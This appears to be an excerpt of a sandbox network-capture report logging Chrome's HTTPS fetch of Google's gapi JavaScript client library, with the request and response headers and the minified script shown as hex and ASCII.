                                                                                                                                                                                                                                  Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b
                                                                                                                                                                                                                                  Data Ascii: alue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28
                                                                                                                                                                                                                                  Data Ascii: function(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 7b 66 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69
                                                                                                                                                                                                                                  Data Ascii: {for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;thi
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79
                                                                                                                                                                                                                                  Data Ascii: h("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototy
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c
                                                                                                                                                                                                                                  Data Ascii: done)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regul
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 5f 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45
                                                                                                                                                                                                                                  Data Ascii: _hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw E
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 74 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74
                                                                                                                                                                                                                                  Data Ascii: this[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length||delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.protot
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e
                                                                                                                                                                                                                                  Data Ascii: ction(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.n
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53
                                                                                                                                                                                                                                  Data Ascii: ray.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a||_.la});ma("S


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  62192.168.2.1649873142.250.181.464436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:29:46 UTC1018OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=client/exm=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_1 HTTP/1.1
                                                                                                                                                                                                                                  Host: apis.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=520=cW9cnGXTgQtIiZ7z-ENJ5DVTszKtaNs5d4mHofa4p-JvtK7Xpo_ZZO8vJSpTycO0rKkRsnajljxdf2c0JfuG_uqbRqXxTHnbHLXksz6GLH-p0EKZAGg9jwHPkRfp29YQfrxPHB40nV4Lb-Z5d3mg8STPfLFvxZAWY9AxijTcPROCDg8e8YKVmDtGGq6IsRi_5ePEp8ARCOQFTlIYyoubHF0MJ0pRxuMvVbhFJZgwHeL_APYIN6IO_AjG7fV-EbgykSiD
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC916INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                  Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                  Content-Length: 209242
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Server: sffe
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Thu, 12 Dec 2024 18:54:19 GMT
                                                                                                                                                                                                                                  Expires: Fri, 12 Dec 2025 18:54:19 GMT
                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                  Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT
                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Age: 520528
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC474INData Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 31 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 42 67 3d 28 77 69 6e 64 6f 77 2e 67 61 70 69 7c 7c 7b 7d 29 2e 6c 6f 61 64 3b 0a 5f 2e 54 6e 3d 5f 2e 42 65 28 5f 2e 4d 65 2c 22 72 77 22 2c 5f 2e 43 65 28 29 29 3b 0a 76 61 72 20 55 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 28 61 3d 5f 2e 54 6e 5b 61 5d 29 26 26 61 2e 73 74 61 74 65 3c 62 26 26 28 61 2e 73 74 61 74 65 3d 62 29 7d 3b 76 61 72 20 56 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 28 61 3d 5f 2e 54 6e 5b 61 5d 29 3f 61 2e 6f 69 64 3a 76 6f 69 64 20 30 3b 69 66 28 61 29 7b 76 61 72 20 62 3d 5f 2e 79 65 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65
                                                                                                                                                                                                                                  Data Ascii: gapi.loaded_1(function(_){var window=this;_.Bg=(window.gapi||{}).load;_.Tn=_.Be(_.Me,"rw",_.Ce());var Un=function(a,b){(a=_.Tn[a])&&a.state<b&&(a.state=b)};var Vn=function(a){a=(a=_.Tn[a])?a.oid:void 0;if(a){var b=_.ye.getElementById(a);b&&b.parentNode
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 2b 22 70 78 22 3a 61 2e 73 74 79 6c 65 2e 77 69 64 74 68 7c 7c 22 33 30 30 70 78 22 29 2b 22 3b 6d 61 72 67 69 6e 3a 30 70 78 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 22 7d 3b 0a 5f 2e 59 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 7b 7d 2c 64 3d 61 2e 78 63 28 29 2c 65 3d 62 26 26 62 2e 77 69 64 74 68 2c 66 3d 62 26 26 62 2e 68 65 69 67 68 74 2c 68 3d 62 26 26 62 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3b 68 26 26 28 63 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 68 29 3b 65 7c 7c 28 65 3d 64 2e 77 69 64 74 68 7c 7c 61 2e 77 69 64 74 68 29 3b 66 7c 7c 28 66 3d 64 2e 68 65 69 67 68 74 7c 7c 61 2e 68 65 69 67 68 74 29 3b 64 2e 77 69 64 74 68 3d 63 2e 77 69 64 74 68 3d 65 3b 64 2e 68 65 69 67 68 74 3d 63 2e 68 65 69
                                                                                                                                                                                                                                  Data Ascii: +"px":a.style.width||"300px")+";margin:0px;border-style:none;"};_.Yn=function(a,b){var c={},d=a.xc(),e=b&&b.width,f=b&&b.height,h=b&&b.verticalAlign;h&&(c.verticalAlign=h);e||(e=d.width||a.width);f||(f=d.height||a.height);d.width=c.width=e;d.height=c.hei
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 3d 65 2e 67 65 74 49 66 72 61 6d 65 45 6c 28 29 3b 65 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 5f 2e 58 6e 28 65 29 7d 7d 3b 0a 5f 2e 50 69 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 77 69 6e 64 6f 77 3b 61 3d 28 61 7c 7c 62 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2e 6d 61 74 63 68 28 52 65 67 45 78 70 28 22 2e 2a 28 5c 5c 3f 7c 23 7c 26 29 75 73 65 67 61 70 69 3d 28 5b 5e 26 23 5d 2b 29 22 29 29 7c 7c 5b 5d 3b 72 65 74 75 72 6e 22 31 22 3d 3d 3d 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 7c 7c 22 22 29 7d 3b 0a 5f 2e 61 6f 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 54 2e 77 68 65 72 65 3d 62 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 62
                                                                                                                                                                                                                                  Data Ascii: function(e){e=e.getIframeEl();e.style.cssText=_.Xn(e)}};_.Pi=function(a){var b=window;a=(a||b.location.href).match(RegExp(".*(\\?|#|&)usegapi=([^&#]+)"))||[];return"1"===decodeURIComponent(a[a.length-1]||"")};_.ao=function(a,b){a.T.where=b;return a};_.b
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 5b 62 5d 2e 63 6f 6e 74 65 6e 74 3b 5f 2e 6e 6f 5b 63 5d 26 26 64 26 26 28 5f 2e 63 6f 5b 63 5d 3d 64 29 7d 7d 69 66 28 77 69 6e 64 6f 77 2e 73 65 6c 66 21 3d 3d 77 69 6e 64 6f 77 2e 74 6f 70 29 7b 61 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 74 6f 53 74 72 69 6e 67 28 29 3b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 5f 2e 6e 6f 29 5f 2e 6e 6f 5b 65 5d 3e 30 26 26 28 62 3d 5f 2e 47 65 28 61 2c 65 2c 22 22 29 29 26 26 28 5f 2e 63 6f 5b 65 5d 3d 62 29 7d 5f 2e 6f 6f 3d 21 30 7d 65 3d 5f 2e 43 65 28 29 3b 5f 2e 45 65 28 5f 2e 63 6f 2c 65 29 3b 72 65 74 75 72 6e 20 65 7d 3b 71 6f 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 61 2e 6d 61 74 63 68 28 2f 5e 68 74 74 70 73 3f 25 33 41 2f 69 29 26 26 28 62 3d 64 65 63 6f 64 65 55 52 49 43 6f
                                                                                                                                                                                                                                  Data Ascii: [b].content;_.no[c]&&d&&(_.co[c]=d)}}if(window.self!==window.top){a=document.location.toString();for(var e in _.no)_.no[e]>0&&(b=_.Ge(a,e,""))&&(_.co[e]=b)}_.oo=!0}e=_.Ce();_.Ee(_.co,e);return e};qo=function(a){var b;a.match(/^https?%3A/i)&&(b=decodeURICo
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 64 3d 61 2e 61 74 74 72 69 62 75 74 65 73 2e 6c 65 6e 67 74 68 2c 65 3d 30 3b 65 3c 64 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 61 2e 61 74 74 72 69 62 75 74 65 73 5b 65 5d 2c 68 3d 66 2e 6e 61 6d 65 2c 6b 3d 66 2e 76 61 6c 75 65 3b 5f 2e 77 6d 2e 63 61 6c 6c 28 46 6f 2c 68 29 3e 3d 30 7c 7c 63 26 26 68 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 22 29 21 3d 30 7c 7c 6b 3d 3d 3d 22 6e 75 6c 6c 22 7c 7c 22 73 70 65 63 69 66 69 65 64 22 69 6e 20 66 26 26 21 66 2e 73 70 65 63 69 66 69 65 64 7c 7c 28 63 26 26 28 68 3d 68 2e 73 75 62 73 74 72 28 35 29 29 2c 62 5b 68 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 3d 6b 29 7d 61 3d 61 2e 73 74 79 6c 65 3b 28 63 3d 47 6f 28 61 26 26 61 2e 68 65 69 67 68 74 29 29 26 26 28 62 2e 68 65 69 67 68 74 3d 53 74 72 69 6e 67 28
                                                                                                                                                                                                                                  Data Ascii: d=a.attributes.length,e=0;e<d;e++){var f=a.attributes[e],h=f.name,k=f.value;_.wm.call(Fo,h)>=0||c&&h.indexOf("data-")!=0||k==="null"||"specified"in f&&!f.specified||(c&&(h=h.substr(5)),b[h.toLowerCase()]=k)}a=a.style;(c=Go(a&&a.height))&&(b.height=String(
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 61 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 2a 22 29 3b 61 3d 5f 2e 43 65 28 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 64 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 66 3d 64 5b 65 5d 3b 76 61 72 20 6b 3d 66 3b 68 3d 62 3b 76 61 72 20 6c 3d 6b 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6d 3d 76 6f 69 64 20 30 3b 69 66 28 6b 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 67 61 70 69 73 63 61 6e 22 29 29 68 3d 0a 6e 75 6c 6c 3b 65 6c 73 65 7b 76 61 72 20 6e 3d 6c 2e 69 6e 64 65 78 4f 66 28 22 67 3a 22 29 3b 6e 3d 3d 30 3f 6d 3d 6c 2e 73 75 62 73 74 72 28 32 29 3a 28 6e 3d 28 6e 3d 53 74 72 69 6e 67 28 6b 2e 63 6c 61 73 73 4e 61 6d 65 7c 7c 6b 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 63 6c 61 73
                                                                                                                                                                                                                                  Data Ascii: a.getElementsByTagName("*");a=_.Ce();for(e=0;e<d.length;e++){f=d[e];var k=f;h=b;var l=k.nodeName.toLowerCase(),m=void 0;if(k.hasAttribute("data-gapiscan"))h=null;else{var n=l.indexOf("g:");n==0?m=l.substr(2):(n=(n=String(k.className||k.getAttribute("clas
                                                                                                                                                                                                                                  2024-12-18 19:29:47 UTC1390INData Raw: 6e 2c 6d 3d 61 2b 22 2f 22 2b 63 2e 61 63 74 69 6f 6e 29 3b 28 6c 3d 5f 2e 57 65 28 22 69 66 72 61 6d 65 73 2f 22 2b 6c 2b 22 2f 75 72 6c 22 29 29 7c 7c 28 6c 3d 22 3a 69 6d 5f 73 6f 63 69 61 6c 68 6f 73 74 3a 2f 3a 73 65 73 73 69 6f 6e 5f 70 72 65 66 69 78 3a 3a 69 6d 5f 70 72 65 66 69 78 3a 5f 2f 77 69 64 67 65 74 2f 72 65 6e 64 65 72 2f 22 2b 6d 2b 22 3f 75 73 65 67 61 70 69 3d 31 22 29 3b 66 6f 72 28 6e 20 69 6e 20 41 6f 29 66 5b 6e 5d 3d 6e 2b 22 2f 22 2b 28 63 5b 6e 5d 7c 7c 41 6f 5b 6e 5d 29 2b 22 2f 22 3b 76 61 72 20 6e 3d 5f 2e 4b 6c 28 5f 2e 79 65 2c 6c 2e 72 65 70 6c 61 63 65 28 5f 2e 63 6d 2c 6d 6f 28 66 29 29 29 3b 6d 3d 22 69 66 72 61 6d 65 73 2f 22 2b 61 2b 22 2f 70 61 72 61 6d 73 2f 22 3b 66 3d 7b 7d 3b 5f 2e 45 65 28 63 2c 66 29 3b 28 6c
                                                                                                                                                                                                                                  Data Ascii: n,m=a+"/"+c.action);(l=_.We("iframes/"+l+"/url"))||(l=":im_socialhost:/:session_prefix::im_prefix:_/widget/render/"+m+"?usegapi=1");for(n in Ao)f[n]=n+"/"+(c[n]||Ao[n])+"/";var n=_.Kl(_.ye,l.replace(_.cm,mo(f)));m="iframes/"+a+"/params/";f={};_.Ee(c,f);(l
